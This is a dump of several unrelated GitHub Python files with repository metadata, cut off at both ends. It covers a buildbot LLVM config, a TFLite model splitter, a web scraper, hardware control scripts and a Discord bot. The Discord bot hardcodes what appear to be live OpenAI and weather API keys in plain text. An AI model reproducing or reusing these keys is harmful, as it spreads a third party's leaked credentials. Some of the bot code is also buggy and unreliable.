w in word_list)\n store = tkMessageBox.askyesno(\"store\", \"Store the common words?\")\n if store: pickle.dump(word_list, open(common_words_file, 'wb'))\n\ndef update_user_words(word_dict):\n global user_words\n user_words = dict(get())\n editor.clearAll()\n out(user_words)\n store = tkMessageBox.askyesno(\"store\", \"Store the user words?\")\n if store: pickle.dump(words, open(user_words_file, 'wb'))\n \n","repo_name":"ukaluzhny/uutils","sub_path":"npp/english.py","file_name":"english.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23398608114","text":"import numpy as np\nfrom config import Config as cf\nfrom optimizers import utils\nfrom optimizers.optimizer import Optimizer\nfrom behaviorPolicy.DeepPolicy.PG_policy_Vehicle import PG_policy_car\n\n\nclass DeepPolicy_Vehicle(Optimizer):\n \"\"\"\n init delay Vector of (1, 4) = [[0, 0, 0, 0]]\n this vector is used to train output Vnet\n\n also, init delay vector of (1, 3) = [[0, 0, 0]]\n this vector is sent to RSUs, RSUs use this vector\n to train output Rnet\n \"\"\"\n def __init__(self, agent_name=None):\n super().__init__(agent_name)\n self.agent_name = agent_name\n self.delayForCar = np.zeros([1, 4])\n self.delayForRsu = np.zeros([1, 3])\n self.policy = PG_policy_car().getPolicy()\n\n def updateDelayCar(self, newVect):\n self.delayForCar = (1 - cf.dp_decay) * self.delayForCar + cf.dp_decay * newVect\n\n def updateDelayRsu(self, newVect):\n self.delayForRsu = (1 - cf.dp_decay) * self.delayForRsu + cf.dp_decay * newVect\n\n def getDelayVectCar(self, message):\n message_id = message.id\n newVect = [0, 0, 0, 0]\n delay = message.getTotalDelay()\n actor = message.getAction()\n newVect[actor] = delay\n return message_id, newVect\n\n def updateReward(self, message, Vnet, Rnet):\n message_id, newVectCar = self.getDelayVectCar(message=message)\n self.updateDelayCar(newVect=np.array(newVectCar).reshape([1, 4]))\n Vnet.updateNet(\n message_id=message_id,\n delayVector=utils.Vector_processing.softmax((-1) * self.delayForCar).reshape([1, 4])\n )\n # If the message was first sent to a rsu then create a vector\n isRsuNext, delayFromRsu = message.getRsuAction()\n if isRsuNext:\n newVect = [0, 0, 0]\n # getRsuAction() is either = {1,2}\n newVect[message.getRsuAction() - 1] = delayFromRsu\n self.updateDelayRsu(newVect=np.array(newVect).reshape([1, 3]))\n Rnet.updateNet(\n message_id=message_id,\n delayVector=utils.Vector_processing.softmax((-1) * self.delayForRsu).reshape([1, 4])\n )\n\n\n\n\n#\n# delayVector = [0, 0, 0, 0]\n# delay = 0.5\n# processor = 3\n# delayVector[processor] = delay\n# print(np.array(delayVector).reshape([1, 4]))\n","repo_name":"youc680/Mobile-Edge-Computing-pyt","sub_path":"optimizers/DeepPolicy/DeepPolicy_Vehicle.py","file_name":"DeepPolicy_Vehicle.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"18818140765","text":"import sys\n\nfrom polyjit.buildbot.builders import register\nfrom polyjit.buildbot import slaves\nfrom polyjit.buildbot.utils import (builder, define, git, ucmd, ucompile, cmd,\n upload_file, ip, s_sbranch,\n s_nightly, s_force, s_trigger,\n hash_upload_to_master)\nfrom polyjit.buildbot.repos import make_cb, make_new_cb, codebases\nfrom polyjit.buildbot.master import URL\nfrom buildbot.plugins import util\nfrom buildbot.changes import filter\n\ncodebase = make_cb(['llvm', 'clang', 'polly', 'openmp', 'compiler-rt'])\nforce_codebase = make_new_cb(['llvm', 'clang', 'polly', 'openmp', 'compiler-rt'])\n\nP = util.Property\nBuildFactory = util.BuildFactory\naccepted_builders = slaves.get_hostlist(slaves.infosun)\n\n\n# yapf: disable\ndef configure(c):\n steps = [\n define(\"LLVM_ROOT\", ip(\"%(prop:builddir)s/llvm\")),\n define(\"UCHROOT_SRC_ROOT\", \"/mnt/llvm\"),\n define(\"CLANG_ROOT\", ip(\"%(prop:LLVM_ROOT)s/tools/clang\")),\n define(\"POLLY_ROOT\", ip(\"%(prop:LLVM_ROOT)s/tools/polly\")),\n define(\"COMPILERRT_ROOT\", ip(\"%(prop:LLVM_ROOT)s/projects/compiler-rt\")),\n define(\"OPENMP_ROOT\", ip(\"%(prop:LLVM_ROOT)s/projects/openmp\")),\n\n git('llvm', 'master', codebases, workdir=P(\"LLVM_ROOT\")),\n git('clang', 'master', codebases, workdir=P(\"CLANG_ROOT\")),\n git('polly', 'master', codebases, workdir=P(\"POLLY_ROOT\")),\n git('compiler-rt', 'master', codebases, workdir=P(\"COMPILERRT_ROOT\")),\n git('openmp', 'master', codebases, workdir=P(\"OPENMP_ROOT\")),\n ucmd('cmake', P(\"UCHROOT_SRC_ROOT\"),\n '-DCMAKE_BUILD_TYPE=Release',\n '-DCMAKE_INSTALL_PREFIX=./_install',\n '-DCMAKE_CXX_FLAGS_RELEASE=-O3 -DNDEBUG -DLLVM_ENABLE_STATS',\n '-DBUILD_SHARED_LIBS=Off',\n '-DPOLLY_BUILD_POLLI=Off',\n '-DLLVM_POLLY_LINK_INTO_TOOLS=OFF',\n '-DLLVM_TARGETS_TO_BUILD=X86',\n '-DLLVM_BINUTILS_INCDIR=/usr/include',\n '-DLLVM_ENABLE_PIC=On',\n '-DLLVM_ENABLE_ASSERTIONS=On',\n '-DLLVM_ENABLE_TERMINFO=Off',\n '-DCLANG_DEFAULT_OPENMP_RUNTIME=libomp',\n '-G', 'Ninja',\n env={\n \"PATH\": \"/opt/cmake/bin:/usr/local/bin:/usr/bin:/bin\"\n },\n name=\"cmake\",\n description=\"cmake O3, Assertions, PIC, Static\"),\n ucompile(\"ninja\", \"install\", haltOnFailure=True, name=\"build llvm\"),\n cmd(\"tar\", \"czf\", \"../llvm.tar.gz\", \"-C\", \"./_install\", \".\")\n ]\n upload_llvm = hash_upload_to_master(\"llvm.tar.gz\",\n \"../llvm.tar.gz\", \"public_html/llvm.tar.gz\", URL)\n steps.extend(upload_llvm)\n\n c['builders'].append(builder(\"build-llvm\", None, accepted_builders,\n tags=['polyjit'], factory=BuildFactory(steps)))\n\ndef schedule(c):\n c['schedulers'].extend([\n s_sbranch(\"build-llvm-sched\", codebase, [\"build-llvm\"], branch=\"master\",\n treeStableTimer=2*60),\n s_force(\"force-build-llvm\", force_codebase, [\"build-llvm\"]),\n s_trigger(\"trigger-build-llvm\", codebase, ['build-llvm']),\n s_nightly(\"nightly-sched-build-llvm\", codebase,\n [\"build-llvm\"],\n hour=20, minute=0)\n ])\n# yapf: enable\n\n\n# register(sys.modules[__name__])\n","repo_name":"PolyJIT/buildbot","sub_path":"polyjit/buildbot/builders/llvm.py","file_name":"llvm.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72398954027","text":"import os\nimport json\nfrom .utils import RunTerminalCommand, ReadJSON, CopyFile, MoveFile\nfrom ..logging.logger import log\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\nMODELS_DIR = os.path.join(WORK_DIR, \"models\")\nMAPPING_DIR = os.path.join(WORK_DIR, \"mapping\")\nRESOURCES_DIR = os.path.join(WORK_DIR, \"resources\")\nSOURCE_DIR = os.path.join(MODELS_DIR, \"source\")\nSUB_DIR = os.path.join(MODELS_DIR, \"sub\")\nCOMPILED_DIR = os.path.join(MODELS_DIR, \"sub\", \"compiled\")\nFINAL_DIR = os.path.join(MODELS_DIR, \"final\")\n\nclass Model:\n def __init__(self, path_to_model: str, schema_path: str):\n self.paths = {\"json\": \"\",\n \"tflite\": \"\",\n \"edgetpu_tflite\": \"\"}\n for ext in self.paths.keys():\n if path_to_model.endswith(ext):\n self.paths[ext] = path_to_model\n self.schema = schema_path\n\n def Convert(self, source_ext: str, target_ext: str):\n try:\n if ([source_ext, target_ext] == [\"json\", \"tflite\"]):\n RunTerminalCommand(\"flatc\", \"-b\", self.schema, self.paths[\"json\"])\n tmp_filename = self.paths[\"json\"].split(\"/\")[-1].split(\".\")[0] + \".tflite\"\n self.paths[\"tflite\"] = self.paths[\"json\"].replace(source_ext, target_ext)\n MoveFile(tmp_filename, self.paths[\"tflite\"])\n elif ([source_ext, target_ext] == [\"tflite\", \"json\"]):\n RunTerminalCommand(\"flatc\", \"-t\", \"--strict-json\", \"--defaults-json\", self.schema, \"--\", self.paths[\"tflite\"])\n tmp_filename = self.paths[\"tflite\"].split(\"/\")[-1].split(\".\")[0] + \".json\"\n self.paths[\"json\"] = self.paths[\"tflite\"].replace(source_ext, target_ext)\n MoveFile(tmp_filename, self.paths[\"json\"])\n self.json = ReadJSON(self.paths[\"json\"])\n except Exception as e:\n import sys\n sys.exit(\"Couldn't convert using 'flatc': {}\".format(e))\n\n def Compile(self):\n if not os.path.exists(COMPILED_DIR):\n os.mkdir(COMPILED_DIR)\n compiling_command = \"/usr/bin/edgetpu_compiler -o {0} -s {1}\".format(COMPILED_DIR, self.paths[\"tflite\"])\n os.system(compiling_command)\n self.paths[\"edgetpu_tflite\"] = os.path.join(COMPILED_DIR, self.paths[\"tflite\"].split(\"/\")[-1].split(\".\")[0] + \"_edgetpu.tflite\")\n\nclass Submodel(Model):\n def __init__(self, source_model_json: dict, op_name: str, target_hardware: str, sequence_index: int):\n self.name = \"submodel_{0}_{1}_{2}\".format(sequence_index, op_name, \"bm\" if target_hardware.lower() == \"\" else target_hardware.lower())\n self.dirs = {\"json\": os.path.join(SUB_DIR, \"json\", self.name),\n \"tflite\": os.path.join(SUB_DIR, \"tflite\", self.name)}\n os.mkdir(self.dirs[\"json\"])\n os.mkdir(self.dirs[\"tflite\"])\n CopyFile(os.path.join(RESOURCES_DIR, \"shell\", \"shell_model.json\"),\n os.path.join(self.dirs[\"json\"], \"shell_model.json\"))\n super().__init__(path_to_model=os.path.join(self.dirs[\"json\"], \"shell_model.json\"),\n schema_path=os.path.join(RESOURCES_DIR, \"schema\", \"schema.fbs\"))\n self.json = ReadJSON(self.paths[\"json\"])\n self.source_model_json = source_model_json\n\n def AddOps(self, layers):\n \"\"\"Adds the appropriate operations, specified by the given layers, to\n the submodel in preparation for saving the submodel.\n\n Args:\n layers (_type_): List of layer mappings, ie. (layer index, layer\n type, target hardware) tupples, that should be converted into a submodel.\n \"\"\"\n\n #Read Main Graph\n source_graph = self.source_model_json[\"subgraphs\"][0].copy()\n\n #Add version\n new_version = self.source_model_json[\"version\"]\n\n #Add Operators from Main Graph and add them according to index op\n new_ops = []\n for op_index in [layer[0] for layer in layers]:\n new_ops.append(source_graph[\"operators\"][op_index])\n\n #Add the OperatorCodes of the Newly added Operators and update their opcode_index\n new_opcodes = []\n for new_op in new_ops:\n if self.source_model_json[\"operator_codes\"][new_op[\"opcode_index\"]] not in new_opcodes:\n new_opcodes.append(self.source_model_json[\"operator_codes\"][new_op[\"opcode_index\"]].copy())\n new_op[\"opcode_index\"] = len(new_opcodes) - 1\n else:\n new_op[\"opcode_index\"] = new_opcodes.index(self.source_model_json[\"operator_codes\"][new_op[\"opcode_index\"]])\n\n #Add Tensors according to added Operators\n new_tensors = []\n tensor_indexes = []\n for new_op in new_ops:\n for entry in [\"inputs\", \"outputs\"]:\n for i, op_entry in enumerate(new_op[entry]):\n if op_entry in tensor_indexes:\n new_op[entry][i] = new_tensors.index(source_graph[\"tensors\"][op_entry])\n else:\n tensor_indexes.append(op_entry)\n new_tensors.append(source_graph[\"tensors\"][op_entry].copy())\n new_op[entry][i] = len(new_tensors) - 1\n\n #Add Submodel Input and Output Tensors\n new_inputs = []\n new_outputs = []\n if new_opcodes[new_ops[0][\"opcode_index\"]][\"deprecated_builtin_code\"] == 0:\n for i_t in new_ops[0][\"inputs\"]:\n new_inputs.append(i_t)\n else:\n new_inputs.append(new_ops[0][\"inputs\"][0])\n\n new_outputs.append(new_ops[-1][\"outputs\"][0])\n\n\n\n #Add Subgraph Name\n if \"name\" in source_graph.keys():\n new_subgraph_name = source_graph[\"name\"]\n self.json[\"subgraphs\"][0][\"name\"] = new_subgraph_name\n else:\n self.json[\"subgraphs\"][0].pop(\"name\", None)\n\n #Add Description\n new_description = self.source_model_json[\"description\"]\n\n #Add Buffers according to the newly added Tensors\n new_buffers = [{}]\n for i,new_tensor in enumerate(new_tensors):\n buffer_index = new_tensor[\"buffer\"]\n if (buffer_index > 0):\n new_buffers.append(self.source_model_json[\"buffers\"][buffer_index].copy())\n new_tensor[\"buffer\"] = len(new_buffers) - 1\n\n #Add metadata\n new_metadata = []\n if \"metadata\" in self.source_model_json.keys():\n for i, source_metadata in enumerate(self.source_model_json[\"metadata\"]):\n new_buffers.append(self.source_model_json[\"buffers\"][source_metadata[\"buffer\"]].copy())\n new_metadata.append(source_metadata)\n new_metadata[-1][\"buffer\"] = len(new_buffers) - 1\n self.json[\"metadata\"] = new_metadata\n else:\n self.json.pop(\"metadata\", None)\n\n #Add SignatureDefs\n #for i, sig_def in enumerate(self.source_model_json[\"signature_defs\"]):\n # for entry in [\"inputs\", \"outputs\"]:\n # for this_entry in sig_def[entry]:\n # if this_entry[\"tensor_index\"] in tensor_indexes:\n # self.json[\"signature_defs\"][i] = self.source_model_json[\"signature_defs\"][i].copy()\n # self.json[\"signature_defs\"][i][entry][\"tensor_index\"]\n\n\n #Update all fields\n self.json[\"version\"] = new_version\n self.json[\"operator_codes\"] = new_opcodes\n\n self.json[\"subgraphs\"][0][\"tensors\"] = new_tensors\n self.json[\"subgraphs\"][0][\"inputs\"] = new_inputs\n self.json[\"subgraphs\"][0][\"outputs\"] = new_outputs\n self.json[\"subgraphs\"][0][\"operators\"] = new_ops\n\n\n self.json[\"description\"] = new_description\n self.json[\"buffers\"] = new_buffers\n\n def Save(self):\n \"\"\"Saves a submodel to a JSON file, labeled using the target hardware,\n the index of the sequence, and the indexes of the layers (in their model)\n that are contained withing the submodel.\n Args:\n target_hardware (str): Name of the hardware that the submodel is to\n be executed on\n sequence_index (int): The index at where the sequence appears in the\n set of sequences to be run on the respective hardware\n \"\"\"\n submodel_filename = f\"{self.name}.json\"\n submodel_filepath = os.path.join(self.dirs[\"json\"], submodel_filename)\n MoveFile(self.paths[\"json\"], submodel_filepath)\n self.paths[\"json\"] = submodel_filepath\n with open(submodel_filepath, \"w\") as fout:\n json.dump(self.json, fout, indent=2)\n","repo_name":"alxhoff/TensorDSE","sub_path":"utils/splitter/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16660491765","text":"import asyncio\nimport time\nimport unittest\n\nimport pytest\n\nfrom ahk import AHK\n\n\nsleep = time.sleep\n\n\nclass TestGui(unittest.TestCase):\n def setUp(self) -> None:\n self.ahk = AHK()\n\n def tearDown(self) -> None:\n self.ahk._transport._proc.kill()\n time.sleep(0.2)\n\n def test_msg_box(self):\n box = self.ahk.msg_box(text='hello', title='test', timeout=3, blocking=False)\n sleep(1)\n win = self.ahk.win_get(title='test')\n assert win is not None\n with pytest.raises(TimeoutError):\n r = box.result()\n\n def test_input_box(self):\n box = self.ahk.input_box(prompt='Question', title='prompt', timeout=3, blocking=False)\n sleep(1)\n win = self.ahk.win_get(title='prompt')\n assert win is not None\n with pytest.raises(TimeoutError):\n r = box.result()\n\n\nclass TestGuiV2(TestGui):\n def setUp(self) -> None:\n self.ahk = AHK(version='v2')\n","repo_name":"spyoungtech/ahk","sub_path":"tests/_sync/test_gui.py","file_name":"test_gui.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":741,"dataset":"github-code","pt":"37"} +{"seq_id":"8746969070","text":"from bs4 import BeautifulSoup\nimport requests\n\nurl_ec = 'https://scraping.official.ec/'\nres = requests.get(url_ec)\nsoup = BeautifulSoup(res.text, 'html.parser')\nitem_list = soup.find('ul', {'id': 'itemList'})\nitems = item_list.find_all('li')\n\ndata_ec = []\nfor item in items:\n datum_ec = {}\n datum_ec['title'] = item.find('p', {'class': 'items-grid_itemTitleText_b58666da'}).text\n price = item.find('p', {'class': 'items-grid_price_b58666da'}).text\n datum_ec['price'] = int(price.replace('¥', '').replace(',', ''))\n datum_ec['link'] = item.find('a')['href']\n is_stock = item.find('p', {'class': 'items-grid_soldOut_b58666da'}) == None\n datum_ec['is_stock'] = '在庫あり' if is_stock == True else '在庫なし'\n data_ec.append(datum_ec)\n print(data_ec)","repo_name":"takuma123-type/Python-web--Scraping","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7505353680","text":"# Planet Radius (compared to Earth)\n# Re = (drop%/100%)^(1/2) * Star Radius * 109\n\n# Planet Radius (compared to Jupiter)\n#Rj = Re * 0.0892\n\n# Kepler's 3rd Law\n# period ^ 2 * star mass = orbital radius ^ 3\n\nluminosity = 2.184\ntemperature = 6465\nmass = 1.25\nradius = 1.19\nperiod_days = 290\nperiod_years = 0.7945205479452054\n\norbital_radius = ((period_years**2) * mass)**(1/3)\nprint(orbital_radius)\n\nradius_earth = ((0.14000000000000057/100)**(1/2))*radius*109\nprint(radius_earth)\n\nradius_jupiter = radius_earth * 0.0892\nprint(radius_jupiter)\n\n","repo_name":"IraLeeBell/solar-systems-astronomy","sub_path":"solar-systems-astronomy/transits-math.py","file_name":"transits-math.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18486057578","text":"#!/usr/bin/env python\nimport time\n\nimport Boards\nfrom Data import Database\n\n\ndef runBoards():\n tempBoard = Boards.TemperatureBoard()\n lightBoard = Boards.LightBoard()\n fanBoard = Boards.FanBoard()\n\n database = Database.Database.getInstance()\n sleepTimeSeconds = 180\n # don't leave the light on for more than 3 minutes\n lightFailsafeSeconds = 180\n lightOnSeconds = 0\n\n print('========================')\n print('| Celsius | Fahrenheit |')\n fmt = '|{cel:.2f}|{fah:.2f}|'\n try:\n while True:\n latestLog = tempBoard.logTemperature()\n print(fmt.format(cel=latestLog.tempCelsius, fah=latestLog.tempFahrenheit))\n if latestLog.tempCelsius < database.getLowerTemp():\n lightBoard.turnOn()\n sleepTimeSeconds = 60\n fanBoard.turnOff()\n elif latestLog.tempCelsius > database.getUpperTemp():\n lightBoard.turnOff()\n sleepTimeSeconds = 180\n fanBoard.turnOn()\n else:\n lightBoard.turnOff()\n sleepTimeSeconds = 180\n fanBoard.turnOff()\n\n if lightBoard.turnedOn and lightOnSeconds >= lightFailsafeSeconds:\n lightBoard.turnOff()\n\n if not lightBoard.turnedOn:\n lightOnSeconds = 0\n\n if lightBoard.turnedOn:\n lightOnSeconds += sleepTimeSeconds\n\n time.sleep(sleepTimeSeconds)\n finally:\n lightBoard.turnOff()\n fanBoard.turnOff()\n\n\nif __name__ == '__main__':\n runBoards()\n","repo_name":"sjyn/FermentationChamber","sub_path":"server/Boards/BoardController.py","file_name":"BoardController.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11196617565","text":"import os\nimport src.services.utils as utils\nfrom src.models import *\nfrom src import cfg, db\nimport src.repositories as repository\n\n\nclass Preprocessor:\n def __init__(self):\n self.dataset_dir = cfg.dataset_dir\n self.embeddingsComputer = utils.EmbeddingsComputer()\n\n def start(self):\n all_file_names = os.listdir(self.dataset_dir)\n processed_texts = Text.query.all()\n not_processed_file_names = [file_name for file_name in all_file_names if file_name not in [textModel.file_name for textModel in processed_texts]]\n print(f'se van a procesar {len(not_processed_file_names)} de un total de {len(all_file_names)}')\n for file_name in not_processed_file_names:\n paragraphs = utils.Parser(file_name, self.dataset_dir).parse()\n if len(paragraphs):\n text_preprocessed = utils.Cleaner(paragraphs).preprocess()\n bigrams = utils.NGramsCalculculator(text_preprocessed).get_bigrams()\n text_embeddings = self.embeddingsComputer.compute(text_preprocessed)\n repository.TextRepository(self.dataset_dir).save(file_name, text_embeddings, bigrams)\n","repo_name":"Fluzko/NLP-Plagiarism-detection","sub_path":"api/src/services/preprocessor/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26759063650","text":"import discord\nfrom CalC import add, subtract, multiply, division, remainder\nfrom twilio_message import *\nfrom Onliner import keep_alive\n\nintents = discord.Intents.default()\nintents.members = True\nclient = discord.Client(intents=intents)\n\ntoken_file = open(\"discord_token.txt\", \"r\")\ntoken = token_file.read()\n\n\n@client.event\nasync def on_ready():\n print( str(client.user) + \" is Ready!!\")\n\n\n@client.event\nasync def on_message(message):\n if client.user == message.author:\n pass\n elif message.content.startswith(\"add\"):\n addResult = add(message.content)\n await message.channel.send(addResult.getResult())\n elif message.content.startswith(\"sub\"):\n subResult = subtract(message.content)\n await message.channel.send(subResult.get_result())\n elif message.content.startswith(\"multiply\"):\n mul_result = multiply(message.content)\n await message.channel.send(mul_result.get_result())\n elif message.content.startswith(\"div\"):\n divResult = division(message.content)\n await message.channel.send(divResult.get_result())\n elif message.content.startswith(\"rem\"):\n remResult = remainder(message.content)\n await message.channel.send(remResult.get_result())\n elif message.content.startswith(\"sms\"):\n sms = twilio_message(message.content)\n await message.channel.send(sms.send_sms())\n\n \n\n\n@client.event\nasync def on_member_join(member):\n for channel in member.guild.channels:\n if str(channel) == \"member-log\":\n await channel.send(f\"{member.mention} Joined, Have a good time here!\")\n\n\n@client.event\nasync def on_member_remove(member):\n for channel in member.guild.channels:\n if str(channel) == \"member-log\":\n await channel.send(f'{member.mention} left, You won\\'t be missed(Probably xD)!')\n\n\nkeep_alive()\nclient.run(token)\n","repo_name":"SuperALKALINEdroiD/Discord-Bot","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39067540695","text":"import discord\r\nfrom discord import app_commands\r\nfrom discord.ext import commands\r\nimport psutil\r\nimport datetime\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nimport aiohttp\r\nimport time\r\nfrom io import BytesIO\r\nimport base64\r\nfrom discord.ui import view\r\nfrom discord.interactions import Interaction\r\nimport requests\r\nimport random\r\n\r\n\r\n\r\nplayers = {}\r\n\r\nAPI_KEY = \"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\"\r\nAPI_KEYS =\"de306122167d419f85381454230704\"\r\n\r\n\r\nintents = discord.Intents.all()\r\nintents.typing = True\r\nbot = commands.Bot(command_prefix=\"!\", intents=intents)\r\n\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(\"Bot Running!\")\r\n try:\r\n synced = await bot.tree.sync()\r\n print(f\"Synced {len(synced)} command(s).\")\r\n except Exception as e:\r\n print(e)\r\n\r\n@bot.tree.command(name=\"help\", description=\"Display a list of available commands.\")\r\nasync def help_command(interaction: discord.Interaction):\r\n # Create a dictionary of available commands and their descriptions\r\n commands_dict = {\r\n \"/about\": \"Displays information about the bot.\",\r\n \"/invite\": \"Creates an invite link for the current channel and displays it in a button.\",\r\n \"/avatar\": \"Displays the avatar of a member..\",\r\n \"/aclear\": \"Deletes all messages in the channel.\",\r\n \"/serverinfo\": \"Displays information about the current server.\",\r\n \"/ask\": \"Get a response from OpenAI's GPT-3.\",\r\n \"/help\": \"Display a list of available commands.\",\r\n\r\n # Add more commands and descriptions here\r\n }\r\n \r\n # Create an embedded message to display the list of commands and descriptions\r\n embed = discord.Embed(title=\"Available Commands\", color=0x00ff00)\r\n for command, description in commands_dict.items():\r\n embed.add_field(name=command, value=description, inline=False)\r\n \r\n # Send the embedded message as a response to the /help command\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n\r\n\r\nWELCOME_CHANNEL_ID = 1057730489663885382 # Replace with the ID of your welcome channel\r\n\r\n@bot.event\r\nasync def on_member_join(member):\r\n # Get the welcome channel\r\n welcome_channel = bot.get_channel(WELCOME_CHANNEL_ID)\r\n\r\n # Create the welcome message embed\r\n embed = discord.Embed(title=f\"Welcome {member.display_name} to the server!\", color=discord.Color.green())\r\n embed.set_thumbnail(url=member.avatar.url)\r\n\r\n # Add a description to the embed\r\n embed.add_field(name=\"Introduction\", value=\"Thanks for joining our server. We hope you have a great time here!\", inline=False)\r\n\r\n # Send the embed to the welcome channel\r\n await welcome_channel.send(embed=embed)\r\n\r\n # Send a direct message to the new member\r\n # Create the message embed\r\n embed = discord.Embed(title=\"Welcome to our server!\", description=\"Before you start chatting, please make sure to follow the rules and guidelines below:\", color=discord.Color.green())\r\n embed.set_thumbnail(url=member.avatar.url)\r\n\r\n # Add the rules and guidelines to the embed\r\n embed.add_field(name=\"Rule 1: Be respectful to others in the server.\", value=\"Treat others with kindness and respect at all times.\")\r\n embed.add_field(name=\"Rule 2: No spamming or flooding the chat with messages.\", value=\"Please refrain from posting repetitive or unnecessary messages.\")\r\n embed.add_field(name=\"Rule 3: No adult content or NSFW content allowed.\", value=\"Any content that is not suitable for all ages is strictly prohibited.\")\r\n embed.add_field(name=\"Rule 4: No advertising or self-promotion without permission from the server staff.\", value=\"Please do not promote your own content or products without permission.\")\r\n embed.add_field(name=\"Rule 5: No hate speech, discrimination, or harassment of any kind.\", value=\"We do not tolerate any form of hate speech, discrimination, or harassment.\")\r\n embed.add_field(name=\"Rule 6: Do not share personal information or sensitive data.\", value=\"Please keep your personal information and sensitive data private and do not share it with others.\")\r\n embed.add_field(name=\"Rule 7: Follow the instructions of the server staff.\", value=\"Please follow the instructions of the server staff at all times.\")\r\n embed.add_field(name=\"Rule 8: Do not use bots or scripts to automate actions in the server.\", value=\"The use of bots or scripts to automate actions in the server is strictly prohibited.\")\r\n embed.add_field(name=\"Rule 9: No trolling or intentionally causing disruption in the server.\", value=\"Please do not engage in trolling or disruptive behavior.\")\r\n embed.add_field(name=\"Rule 10: Do not use offensive language or slurs.\", value=\"Please be mindful of the language you use and avoid using offensive slurs.\")\r\n\r\n # Send the embed to the new member\r\n await member.send(embed=embed)\r\n\r\n\r\n@bot.event\r\nasync def on_message(message):\r\n if not message.author.bot:\r\n if message.content.startswith('!weather') or message.content.startswith('!generate'):\r\n await message.channel.send(f\"Please use the slash command '/{message.content[1:]}' instead of the regular command '{message.content}'\")\r\n else:\r\n await bot.process_commands(message)\r\n\r\n\r\n\r\n\r\n@bot.tree.command(name=\"aclear\", description=\"Deletes all messages in the channel.\")\r\n@commands.has_permissions(manage_messages=True)\r\nasync def aclear(interaction: discord.Interaction):\r\n if not interaction.user.guild_permissions.manage_messages:\r\n emoji = \"❌\"\r\n await interaction.response.react(emoji)\r\n await interaction.response.send_message(\"You do not have permission to use this command.\")\r\n return\r\n\r\n channel = interaction.channel\r\n\r\n await channel.purge()\r\n\r\n confirm_embed = discord.Embed(title=\"Clear Command Executed\", description=f\"All messages in {channel.mention} have been deleted by {interaction.user.mention}\", color=discord.Color.red())\r\n confirm_embed.set_author(name=\"MultiVerse Hub Bot\")\r\n await interaction.response.send_message(embed=confirm_embed)\r\n\r\n await interaction.response.send_message(\"Messages have been deleted successfully.\")\r\n\r\n\r\n\r\n@bot.tree.command(name=\"avatar\", description=\"Displays the avatar of a member.\")\r\nasync def avatar(interaction: discord.Interaction, member: discord.Member):\r\n avatar_url: str = member.avatar.url\r\n embed: discord.Embed = discord.Embed(title=f\"Avatar of {member.name}\", color=member.color)\r\n embed.set_image(url=avatar_url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n\r\n@bot.tree.command()\r\nasync def about(interaction):\r\n \"\"\"Displays information about the bot.\"\"\"\r\n cpu_usage = psutil.cpu_percent()\r\n uptime = str(datetime.timedelta(seconds=int(psutil.boot_time() - psutil.Process().create_time())))\r\n embed = discord.Embed(title=\"About Bot\", color=0x00ff00)\r\n embed.add_field(name=\"Bot Ping\", value=f\"{round(bot.latency * 1000)}ms\")\r\n embed.add_field(name=\"Bot Code\", value=\"This bot was written in Python using the Discord.py library.\")\r\n embed.add_field(name=\"Bot Author\", value=\"This bot was fully written by **Mohammad Sibbir**\")\r\n embed.add_field(name=\"Servers Watching\", value=len(bot.guilds))\r\n embed.add_field(name=\"CPU Usage\", value=f\"{cpu_usage}%\")\r\n embed.add_field(name=\"Uptime\", value=uptime)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n@bot.tree.command(name=\"serverinfo\", description=\"Displays information about the current server.\")\r\nasync def serverinfo(interaction: discord.Interaction):\r\n guild = interaction.guild\r\n embed = discord.Embed(title=f\"{guild.name} ({guild.id})\", color=0x00ff00)\r\n embed.set_thumbnail(url=guild.icon.url)\r\n embed.add_field(name=\"Owner\", value=guild.owner.mention)\r\n embed.add_field(name=\"Created At\", value=guild.created_at.strftime(\"%b %d, %Y\"))\r\n embed.add_field(name=\"Members\", value=guild.member_count)\r\n embed.add_field(name=\"Roles\", value=len(guild.roles))\r\n embed.add_field(name=\"Text Channels\", value=len(guild.text_channels))\r\n embed.add_field(name=\"Voice Channels\", value=len(guild.voice_channels))\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@bot.tree.command(description=\"Get a response from OpenAI's GPT-3\")\r\nasync def ask(interaction: discord.Interaction, *, prompt: str):\r\n async with aiohttp.ClientSession() as session:\r\n payload = {\r\n \"model\": \"text-davinci-003\",\r\n \"prompt\": prompt,\r\n \"temperature\": 0.5,\r\n \"max_tokens\": 50,\r\n \"presence_penalty\": 0,\r\n \"frequency_penalty\": 0,\r\n \"best_of\": 1,\r\n }\r\n headers = {\"Authorization\": f\"Bearer {API_KEY}\"}\r\n async with session.post(\"https://api.openai.com/v1/completions\", json=payload, headers=headers) as resp:\r\n response = await 